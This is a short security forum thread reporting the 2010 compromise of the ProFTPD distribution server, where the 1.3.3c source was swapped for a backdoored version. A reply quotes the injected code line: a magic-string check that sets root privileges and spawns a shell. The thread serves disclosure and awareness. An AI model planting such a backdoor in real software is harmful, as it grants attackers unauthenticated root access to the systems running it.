LinuxQuestions.org - ProFTPD.org Compromised, Backdoor Distributed

- Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)

- - ProFTPD.org Compromised, Backdoor Distributed (https://www.linuxquestions.org/questions/linux-security-4/proftpd-org-compromised-backdoor-distributed-847916/)

win32sux

12-02-2010 08:21 AM

ProFTPD.org Compromised, Backdoor Distributed

Quote:

A warning has been issued by the developers of ProFTPD, the popular FTP server software, about a compromise of the main distribution server of the software project that resulted in attackers exchanging the offered source files for ProFTPD 1.3.3c with a version containing a backdoor.

Complete Article

Thanks to Slashdot for covering this.

unSpawn

12-02-2010 01:07 PM

"The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server".
...and that makes the score ProFTPd: 35, VsFTPd 8.

Code:

+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

All times are GMT -5. The time now is 01:46 AM.